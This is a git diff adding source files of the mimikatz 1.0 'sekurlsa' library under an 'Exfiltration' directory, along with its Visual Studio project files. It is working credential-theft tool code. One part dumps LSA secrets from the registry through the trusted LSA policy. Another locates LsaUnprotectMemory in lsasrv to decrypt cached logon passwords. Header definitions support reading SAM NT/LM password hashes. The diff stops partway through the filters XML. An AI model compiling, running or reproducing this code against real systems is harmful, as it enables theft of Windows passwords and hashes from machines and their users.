+DECLARE_HANDLE(HDOMAIN); + +typedef struct _SAMPR_RID_ENUMERATION +{ + unsigned long RelativeId; + LSA_UNICODE_STRING Name; +} SAMPR_RID_ENUMERATION, *PSAMPR_RID_ENUMERATION; + +typedef struct _SAMPR_ENUMERATION_BUFFER +{ + unsigned long EntriesRead; + [size_is(EntriesRead)] PSAMPR_RID_ENUMERATION Buffer; +} SAMPR_ENUMERATION_BUFFER, *PSAMPR_ENUMERATION_BUFFER; + +typedef enum _USER_INFORMATION_CLASS +{ + UserInternal1Information = 18, + UserAllInformation = 21, +} USER_INFORMATION_CLASS, *PUSER_INFORMATION_CLASS; + +typedef struct _ENCRYPTED_LM_OWF_PASSWORD +{ + BYTE data[16]; +} ENCRYPTED_LM_OWF_PASSWORD, *PENCRYPTED_LM_OWF_PASSWORD, ENCRYPTED_NT_OWF_PASSWORD, *PENCRYPTED_NT_OWF_PASSWORD; + +typedef struct _SAMPR_USER_INTERNAL1_INFORMATION +{ + ENCRYPTED_NT_OWF_PASSWORD EncryptedNtOwfPassword; + ENCRYPTED_LM_OWF_PASSWORD EncryptedLmOwfPassword; + unsigned char NtPasswordPresent; + unsigned char LmPasswordPresent; + unsigned char PasswordExpired; +} SAMPR_USER_INTERNAL1_INFORMATION, *PSAMPR_USER_INTERNAL1_INFORMATION; + +typedef struct _OLD_LARGE_INTEGER { + unsigned long LowPart; + long HighPart; +} OLD_LARGE_INTEGER, *POLD_LARGE_INTEGER; + +typedef struct _SAMPR_SR_SECURITY_DESCRIPTOR { + [range(0, 256 * 1024)] unsigned long Length; + [size_is(Length)] unsigned char* SecurityDescriptor; +} SAMPR_SR_SECURITY_DESCRIPTOR, *PSAMPR_SR_SECURITY_DESCRIPTOR; + +typedef struct _SAMPR_LOGON_HOURS { + unsigned short UnitsPerWeek; + [size_is(1260), length_is((UnitsPerWeek+7)/8)] + unsigned char* LogonHours; +} SAMPR_LOGON_HOURS, *PSAMPR_LOGON_HOURS; + +typedef struct _SAMPR_USER_ALL_INFORMATION +{ + OLD_LARGE_INTEGER LastLogon; + OLD_LARGE_INTEGER LastLogoff; + OLD_LARGE_INTEGER PasswordLastSet; + OLD_LARGE_INTEGER AccountExpires; + OLD_LARGE_INTEGER PasswordCanChange; + OLD_LARGE_INTEGER PasswordMustChange; + LSA_UNICODE_STRING UserName; + LSA_UNICODE_STRING FullName; + LSA_UNICODE_STRING HomeDirectory; + LSA_UNICODE_STRING HomeDirectoryDrive; + LSA_UNICODE_STRING ScriptPath; + LSA_UNICODE_STRING ProfilePath; + LSA_UNICODE_STRING AdminComment; + LSA_UNICODE_STRING WorkStations; + LSA_UNICODE_STRING UserComment; + LSA_UNICODE_STRING Parameters; + LSA_UNICODE_STRING LmOwfPassword; + LSA_UNICODE_STRING NtOwfPassword; + LSA_UNICODE_STRING PrivateData; + SAMPR_SR_SECURITY_DESCRIPTOR SecurityDescriptor; + unsigned long UserId; + unsigned long PrimaryGroupId; + unsigned long UserAccountControl; + unsigned long WhichFields; + SAMPR_LOGON_HOURS LogonHours; + unsigned short BadPasswordCount; + unsigned short LogonCount; + unsigned short CountryCode; + unsigned short CodePage; + unsigned char LmPasswordPresent; + unsigned char NtPasswordPresent; + unsigned char PasswordExpired; + unsigned char PrivateDataSensitive; +} SAMPR_USER_ALL_INFORMATION, *PSAMPR_USER_ALL_INFORMATION; + +typedef [switch_is(USER_INFORMATION_CLASS)] union _SAMPR_USER_INFO_BUFFER /* http://msdn.microsoft.com/en-us/library/cc211885.aspx */ +{ + [case(UserInternal1Information)] + SAMPR_USER_INTERNAL1_INFORMATION Internal1; + [case(UserAllInformation)] + SAMPR_USER_ALL_INFORMATION All; +} SAMPR_USER_INFO_BUFFER, *PSAMPR_USER_INFO_BUFFER; + +WUserAllInformation UserInformationsToStruct(USER_INFORMATION_CLASS type, PSAMPR_USER_INFO_BUFFER & monPtr); +bool descrToPipeInformations(mod_pipe * monPipe, USER_INFORMATION_CLASS type, WUserAllInformation & mesInfos, bool isCSV = false); +bool descrUserHistoryToPipe(mod_pipe * monPipe, DWORD rid, wstring monUserName, wstring domainName, HUSER handleUser, USER_INFORMATION_CLASS type, bool isCSV = false); +wstring toTimeFromOLD_LARGE_INTEGER(OLD_LARGE_INTEGER & monInt, bool isStrict = false); +wstring protectMe(wstring &maChaine); +void correctMe(wstring &maChaine); + +typedef NTSTATUS (WINAPI * PSAM_I_CONNECT) (DWORD, HSAM *, DWORD, DWORD); +typedef NTSTATUS (WINAPI * PSAM_R_OPEN_DOMAIN) (HSAM, DWORD dwAccess, PSID, HDOMAIN*); +typedef NTSTATUS (WINAPI * PSAM_R_OPEN_USER) (HDOMAIN, DWORD dwAccess, DWORD, HUSER*); +typedef NTSTATUS (WINAPI * PSAM_R_ENUMERATE_USERS_IN_DOMAIN) (HDOMAIN, DWORD*, DWORD, PSAMPR_ENUMERATION_BUFFER *, DWORD, PVOID); +typedef NTSTATUS (WINAPI * PSAM_R_QUERY_INFORMATION_USER) (HUSER, DWORD, PSAMPR_USER_INFO_BUFFER *); +typedef HLOCAL (WINAPI * PSAM_I_FREE_SAMPR_USER_INFO_BUFFER) (PVOID, DWORD); +typedef HLOCAL (WINAPI * PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER) (PSAMPR_ENUMERATION_BUFFER); +typedef NTSTATUS (WINAPI * PSAM_R_CLOSE_HANDLE) (PHANDLE); +typedef NTSTATUS (WINAPI * PSAM_I_GET_PRIVATE_DATA) (HUSER, DWORD *, DWORD *, DWORD *, PWHashHistory *); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp new file mode 100644 index 0000000..06d8664 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp @@ -0,0 +1,99 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#include "secrets.h" + +PLSA_I_OPEN_POLICY_TRUSTED LsaIOpenPolicyTrusted = NULL; +PLSA_R_OPEN_SECRET LsarOpenSecret = NULL; +PLSA_R_QUERY_SECRET LsarQuerySecret = NULL; +PLSA_R_CLOSE LsarClose = NULL; + +bool searchSECFuncs() +{ + if(!(LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose)) + { + if(HMODULE hLsasrv = GetModuleHandle(L"lsasrv")) + { + LsaIOpenPolicyTrusted = reinterpret_cast<PLSA_I_OPEN_POLICY_TRUSTED>(GetProcAddress(hLsasrv, "LsaIOpenPolicyTrusted")); + LsarOpenSecret = reinterpret_cast<PLSA_R_OPEN_SECRET>(GetProcAddress(hLsasrv, "LsarOpenSecret")); + LsarQuerySecret = reinterpret_cast<PLSA_R_QUERY_SECRET>(GetProcAddress(hLsasrv, "LsarQuerySecret")); + LsarClose = reinterpret_cast<PLSA_R_CLOSE>(GetProcAddress(hLsasrv, "LsarClose")); + } + return (LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose); + } + else return true; +} + +__kextdll bool __cdecl getSECFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + wostringstream monStream; + monStream << L"** lsasrv.dll ** ; Statut recherche : " << (searchSECFuncs() ? L"OK :)" : L"KO :(") << endl << endl << + L"@LsaIOpenPolicyTrusted = " << LsaIOpenPolicyTrusted << endl << + L"@LsarOpenSecret = " << LsarOpenSecret << endl << + L"@LsarQuerySecret = " << LsarQuerySecret << endl << + L"@LsarClose = " << LsarClose << endl; + return sendTo(monPipe, monStream.str()); +} + +__kextdll bool __cdecl getSecrets(mod_pipe * monPipe, vector<wstring> * mesArguments) +{ + if(searchSECFuncs()) + { + bool sendOk = true; + wstring message; + LSA_HANDLE hPolicy; + + if(NT_SUCCESS(LsaIOpenPolicyTrusted(&hPolicy))) + { + HKEY hKeysSecrets; + if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SECURITY\\Policy\\Secrets", 0, KEY_READ, &hKeysSecrets) == ERROR_SUCCESS) + { + DWORD nbKey, maxKeySize; + if(RegQueryInfoKey(hKeysSecrets, NULL, NULL, NULL, &nbKey, &maxKeySize, NULL, NULL, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) + { + for(DWORD i = 0; (i < nbKey) && sendOk; i++) + { + DWORD buffsize = (maxKeySize+1) * sizeof(wchar_t); + LSA_UNICODE_STRING monNomSecret = {0, 0, new wchar_t[buffsize]}; + + if(RegEnumKeyEx(hKeysSecrets, i, monNomSecret.Buffer, &buffsize, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) + { + monNomSecret.Length = monNomSecret.MaximumLength = static_cast<USHORT>(buffsize * sizeof(wchar_t)); + message.assign(L"\nSecret : "); message.append(mod_text::stringOfSTRING(monNomSecret)); message.push_back(L'\n'); + + LSA_HANDLE hSecret; + if(NT_SUCCESS(LsarOpenSecret(hPolicy, &monNomSecret, SECRET_QUERY_VALUE, &hSecret))) + { + LSA_SECRET * monSecret = NULL; + if(NT_SUCCESS(LsarQuerySecret(hSecret, &monSecret, NULL, NULL, NULL))) + { + message.append(L"Credential : "); message.append(mod_text::stringOrHex(reinterpret_cast<PBYTE>(monSecret->Buffer), monSecret->Length)); message.push_back(L'\n'); + LsaFreeMemory(monSecret); + } + else message.append(L"Erreur : Impossible de récupérer le secret\n"); + LsarClose(&hSecret); + } + else message.append(L"Erreur : Impossible d\'ouvrir le secret\n"); + } + delete[] monNomSecret.Buffer; + sendOk = sendTo(monPipe, message); + } + message.clear(); + } else message.assign(L"Erreur : Impossible d\'obtenir des information sur le registre secret\n"); + RegCloseKey(hKeysSecrets); + } + else message.assign(L"Erreur : Impossible d\'ouvrir la clé Secrets\n"); + LsarClose(&hPolicy); + } + else message.assign(L"Erreur : Impossible d\'ouvrir la politique\n"); + + if(!message.empty()) + sendOk = sendTo(monPipe, message); + + return sendOk; + } + else return getSECFunctions(monPipe, mesArguments); +} diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h new file mode 100644 index 0000000..cb74837 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h @@ -0,0 +1,29 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#pragma once +#include "kmodel.h" +#include "mod_text.h" +#include <wincred.h> + +bool searchSECFuncs(); +__kextdll bool __cdecl getSECFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments); +__kextdll bool __cdecl getSecrets(mod_pipe * monPipe, vector<wstring> * mesArguments); + +#define SECRET_SET_VALUE 0x00000001 +#define SECRET_QUERY_VALUE 0x00000002 + +typedef struct _LSA_SECRET +{ + DWORD Length; + DWORD MaximumLength; + wchar_t * Buffer; +} LSA_SECRET, *PLSA_SECRET; + +typedef NTSTATUS (WINAPI * PLSA_I_OPEN_POLICY_TRUSTED) (LSA_HANDLE * pHPolicy); +typedef NTSTATUS (WINAPI * PLSA_R_OPEN_SECRET) (LSA_HANDLE hPolicy, LSA_UNICODE_STRING *, DWORD dwAccess, LSA_HANDLE * hSecret); +typedef NTSTATUS (WINAPI * PLSA_R_QUERY_SECRET) (LSA_HANDLE hSecret, PLSA_SECRET * ppSecret, PVOID pCurrentValueSetTime, PLSA_UNICODE_STRING * ppOldSecret, PVOID pOldValueSetTime); +typedef NTSTATUS (WINAPI * PLSA_R_CLOSE) (LSA_HANDLE * pHandle); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp new file mode 100644 index 0000000..1d07596 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp @@ -0,0 +1,86 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#include "sekurlsa.h" +PLSA_SECPKG_FUNCTION_TABLE SeckPkgFunctionTable = NULL; + +__kextdll bool __cdecl getDescription(wstring * maDescription) +{ + maDescription->assign(L"SekurLSA : librairie de manipulation des données de sécurités dans LSASS\n"); + return mod_system::getVersion(&mod_system::GLOB_Version); +} + +bool searchLSAFuncs() +{ + if(!SeckPkgFunctionTable) + { + if(HMODULE hLsasrv = GetModuleHandle(L"lsasrv")) + { + struct {PVOID LsaIRegisterNotification; PVOID LsaICancelNotification;} extractPkgFunctionTable = {GetProcAddress(hLsasrv, "LsaIRegisterNotification"), GetProcAddress(hLsasrv, "LsaICancelNotification")}; + if(extractPkgFunctionTable.LsaIRegisterNotification && extractPkgFunctionTable.LsaICancelNotification) + mod_memory::genericPatternSearch(reinterpret_cast<PBYTE *>(&SeckPkgFunctionTable), L"lsasrv", reinterpret_cast<PBYTE>(&extractPkgFunctionTable), sizeof(extractPkgFunctionTable), - FIELD_OFFSET(LSA_SECPKG_FUNCTION_TABLE, RegisterNotification), NULL, true, true); + } + } + return (SeckPkgFunctionTable != NULL); +} + +wstring getPasswordFromProtectedUnicodeString(LSA_UNICODE_STRING * ptrPass) +{ + wstring password; + if(ptrPass->Buffer && (ptrPass->Length > 0)) + { + BYTE * monPass = new BYTE[ptrPass->MaximumLength]; + RtlCopyMemory(monPass, ptrPass->Buffer, ptrPass->MaximumLength); + SeckPkgFunctionTable->LsaUnprotectMemory(monPass, ptrPass->MaximumLength); + password.assign(mod_text::stringOrHex(reinterpret_cast<PBYTE>(monPass), ptrPass->Length)); + delete[] monPass; + } + return password; +} + +bool getLogonData(mod_pipe * monPipe, vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders) +{ + bool sendOk = true; + PLUID sessions; + ULONG count; + + if (NT_SUCCESS(LsaEnumerateLogonSessions(&count, &sessions))) + { + for (ULONG i = 0; i < count && sendOk; i++) + { + PSECURITY_LOGON_SESSION_DATA sessionData = NULL; + if(NT_SUCCESS(LsaGetLogonSessionData(&sessions[i], &sessionData))) + { + if(sessionData->LogonType != Network) + { + wostringstream maPremiereReponse; + maPremiereReponse << endl << + L"Authentification Id : " << sessions[i].HighPart << L";" << sessions[i].LowPart << endl << + L"Package d\'authentification : " << mod_text::stringOfSTRING(sessionData->AuthenticationPackage) << endl << + L"Utilisateur principal : " << mod_text::stringOfSTRING(sessionData->UserName) << endl << + L"Domaine d\'authentification : " << mod_text::stringOfSTRING(sessionData->LogonDomain) << endl; + + sendOk = sendTo(monPipe, maPremiereReponse.str()); + + for(vector<pair<PFN_ENUM_BY_LUID, wstring>>::iterator monProvider = mesProviders->begin(); monProvider != mesProviders->end(); monProvider++) + { + wostringstream maSecondeReponse; + maSecondeReponse << L'\t' << monProvider->second << L" : \t"; + sendOk = sendTo(monPipe, maSecondeReponse.str()); + monProvider->first(&sessions[i], monPipe, mesArguments->empty()); + sendOk = sendTo(monPipe, L"\n"); + } + } + LsaFreeReturnBuffer(sessionData); + } + else sendOk = sendTo(monPipe, L"Erreur : Impossible d\'obtenir les données de session\n"); + } + LsaFreeReturnBuffer(sessions); + } + else sendOk = sendTo(monPipe, L"Erreur : Impossible d\'énumerer les sessions courantes\n"); + + return sendOk; +} diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h new file mode 100644 index 0000000..c36e173 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h @@ -0,0 +1,23 @@ +/* Benjamin DELPY `gentilkiwi` + http://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : http://creativecommons.org/licenses/by/3.0/fr/ + Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ +*/ +#pragma once +#include "kmodel.h" +#include "secpkg.h" +#include "mod_memory.h" +#include "mod_system.h" +#include "mod_text.h" +#include "mod_process.h" + +extern PLSA_SECPKG_FUNCTION_TABLE SeckPkgFunctionTable; + +bool searchLSAFuncs(); +__kextdll bool __cdecl getDescription(wstring * maDescription); + +typedef bool (WINAPI * PFN_ENUM_BY_LUID) (__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity); +bool getLogonData(mod_pipe * monPipe, vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders); + +wstring getPasswordFromProtectedUnicodeString(LSA_UNICODE_STRING * ptrPass); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc Binary files differnew file mode 100644 index 0000000..2243435 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj new file mode 100644 index 0000000..dbea2a6 --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj @@ -0,0 +1,154 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{3A436EFD-4FD7-4E5F-B0EC-F9DCCACF1E60}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sekurlsa</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + <UseOfMfc>Static</UseOfMfc> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + <UseOfMfc>Static</UseOfMfc> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\</OutDir> + <IntDir>$(Platform)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\</OutDir> + <IntDir>$(Platform)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>NotUsing</PrecompiledHeader> + <Optimization>Full</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;PSAPI_VERSION=1;_WINDOWS;_USRDLL;SEKURLSA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> + <StringPooling>true</StringPooling> + <ExceptionHandling>false</ExceptionHandling> + <FloatingPointModel>Fast</FloatingPointModel> + <FloatingPointExceptions>false</FloatingPointExceptions> + <CreateHotpatchableImage>false</CreateHotpatchableImage> + <ErrorReporting>None</ErrorReporting> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>psapi.lib;secur32.lib;advapi32.lib;shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> + <LinkErrorReporting>NoErrorReport</LinkErrorReporting> + <ModuleDefinitionFile> + </ModuleDefinitionFile> + </Link> + <ResourceCompile> + <Culture>0x040c</Culture> + </ResourceCompile> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>NotUsing</PrecompiledHeader> + <Optimization>Full</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;PSAPI_VERSION=1;_WINDOWS;_USRDLL;SEKURLSA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> + <StringPooling>true</StringPooling> + <ExceptionHandling>false</ExceptionHandling> + <FloatingPointModel>Fast</FloatingPointModel> + <FloatingPointExceptions>false</FloatingPointExceptions> + <CreateHotpatchableImage>false</CreateHotpatchableImage> + <ErrorReporting>None</ErrorReporting> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>psapi.lib;secur32.lib;advapi32.lib;shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> + <LinkErrorReporting>NoErrorReport</LinkErrorReporting> + <ModuleDefinitionFile> + </ModuleDefinitionFile> + </Link> + <ResourceCompile> + <Culture>0x040c</Culture> + </ResourceCompile> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\commun\kmodel.cpp" /> + <ClCompile Include="..\..\modules\mod_memory.cpp" /> + <ClCompile Include="..\..\modules\mod_parseur.cpp" /> + <ClCompile Include="..\..\modules\mod_pipe.cpp" /> + <ClCompile Include="..\..\modules\mod_process.cpp" /> + <ClCompile Include="..\..\modules\mod_system.cpp" /> + <ClCompile Include="..\..\modules\mod_text.cpp" /> + <ClCompile Include="modules\credman.cpp" /> + <ClCompile Include="modules\incognito.cpp" /> + <ClCompile Include="modules\sam.cpp" /> + <ClCompile Include="modules\secrets.cpp" /> + <ClCompile Include="Security Packages\msv1_0.cpp" /> + <ClCompile Include="Security Packages\msv1_0_helper.cpp" /> + <ClCompile Include="sekurlsa.cpp" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\commun\kmodel.h" /> + <ClInclude Include="..\..\commun\secpkg.h" /> + <ClInclude Include="..\..\modules\mod_memory.h" /> + <ClInclude Include="..\..\modules\mod_parseur.h" /> + <ClInclude Include="..\..\modules\mod_pipe.h" /> + <ClInclude Include="..\..\modules\mod_process.h" /> + <ClInclude Include="..\..\modules\mod_system.h" /> + <ClInclude Include="..\..\modules\mod_text.h" /> + <ClInclude Include="modules\credman.h" /> + <ClInclude Include="modules\incognito.h" /> + <ClInclude Include="modules\sam.h" /> + <ClInclude Include="modules\secrets.h" /> + <ClInclude Include="Security Packages\msv1_0.h" /> + <ClInclude Include="Security Packages\msv1_0_helper.h" /> + <ClInclude Include="sekurlsa.h" /> + </ItemGroup> + <ItemGroup> + <ResourceCompile Include="sekurlsa.rc" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project>
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters new file mode 100644 index 0000000..936fcde --- /dev/null +++ b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters @@ -0,0 +1,122 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Modules Communs"> + <UniqueIdentifier>{87c9f520-31d1-4b44-a523-415e0c703bde}</UniqueIdentifier> + </Filter> + <Filter Include="Modules Communs\Communication"> + <UniqueIdentifier>{8c6588bf-b3cf-4080-b59e-3ce82a6ccd62}</UniqueIdentifier> + </Filter> + <Filter Include="Modules Communs\Parseur"> + <UniqueIdentifier>{9e44771d-18f4-407a-8f89-508cf5c366ff}</UniqueIdentifier> + </Filter> + <Filter Include="Modules Communs\Librairie Modèle"> + <UniqueIdentifier>{541a9eff-641d-4a77-9b1f-e72ad6a7c0fa}</UniqueIdentifier> + </Filter> + <Filter Include="Modules Communs\Mémoire"> + <UniqueIdentifier>{ba6b07a5-6d5b-4632-ad6e-56690630eaa7}</UniqueIdentifier> + </Filter> + <Filter Include="Security Packages"> + <UniqueIdentifier>{1e52fbf9-a352-419f-870b-3c4e265781d8}</UniqueIdentifier> + <Extensions> + </Extensions> + </Filter> + <Filter Include="Modules Communs\System"> + <UniqueIdentifier>{7fcd7c52-b4e5-4c6c-9dc7-190fbe667193}</UniqueIdentifier> + </Filter> + <Filter Include="Modules Communs\Texte"> + <UniqueIdentifier>{c175e3ec-41d0-4474-bbc7-eb1962a7fc70}</UniqueIdentifier> + </Filter> + <Filter Include="Modules locaux pour sekurlsa"> + <UniqueIdentifier>{b3819528-2e60-46a3-b37a-7c575a4d866a}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\modules\mod_pipe.cpp"> + <Filter>Modules Communs\Communication</Filter> + </ClCompile> + <ClCompile Include="..\..\modules\mod_parseur.cpp"> + <Filter>Modules Communs\Parseur</Filter> + </ClCompile> + <ClCompile Include="..\..\commun\kmodel.cpp"> + <Filter>Modules Communs\Librairie Modèle</Filter> + </ClCompile> + <ClCompile Include="..\..\modules\mod_memory.cpp"> + <Filter>Modules Communs\Mémoire</Filter> + </ClCompile> + <ClCompile Include="sekurlsa.cpp" /> + <ClCompile Include="..\..\modules\mod_system.cpp"> + <Filter>Modules Communs\System</Filter> + </ClCompile> + <ClCompile Include="Security Packages\msv1_0.cpp"> + <Filter>Security Packages</Filter> + </ClCompile> + <ClCompile Include="Security Packages\msv1_0_helper.cpp"> + <Filter>Security Packages</Filter> + </ClCompile> + <ClCompile Include="..\..\modules\mod_text.cpp"> + <Filter>Modules Communs\Texte</Filter> + </ClCompile> + <ClCompile Include="..\..\modules\mod_process.cpp"> + <Filter>Modules Communs\System</Filter> + </ClCompile> + <ClCompile Include="modules\incognito.cpp"> + <Filter>Modules locaux pour sekurlsa</Filter> + </ClCompile> + <ClCompile Include="modules\secrets.cpp"> + <Filter>Modules locaux pour sekurlsa</Filter> + </ClCompile> + <ClCompile Include="modules\credman.cpp"> + <Filter>Modules locaux pour sekurlsa</Filter> + </ClCompile> + <ClCompile Include="modules\sam.cpp"> + <Filter>Modules locaux pour sekurlsa</Filter> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\modules\mod_pipe.h"> + <Filter>Modules Communs\Communication</Filter> + </ClInclude> + <ClInclude Include="..\..\modules\mod_parseur.h"> + <Filter>Modules Communs\Parseur</Filter> + </ClInclude> + <ClInclude Include="..\..\commun\kmodel.h"> + <Filter>Modules Communs\Librairie Modèle</Filter> + </ClInclude> + <ClInclude Include="..\..\modules\mod_memory.h"> + <Filter>Modules Communs\Mémoire</Filter> + </ClInclude> + <ClInclude Include="sekurlsa.h" /> + <ClInclude Include="..\..\modules\mod_system.h"> + <Filter>Modules Communs\System</Filter> + </ClInclude> + <ClInclude Include="Security Packages\msv1_0.h"> + <Filter>Security Packages</Filter> + </ClInclude> + <ClInclude Include="Security Packages\msv1_0_helper.h"> + <Filter>Security Packages</Filter> + </ClInclude> + <ClInclude Include="..\..\modules\mod_text.h"> + <Filter>Modules Communs\Texte</Filter> + </ClInclude> + <ClInclude Include="..\..\commun\secpkg.h" /> + <ClInclude Include="..\..\modules\mod_process.h"> + <Filter>Modules Communs\System</Filter> + </ClInclude> + <ClInclude 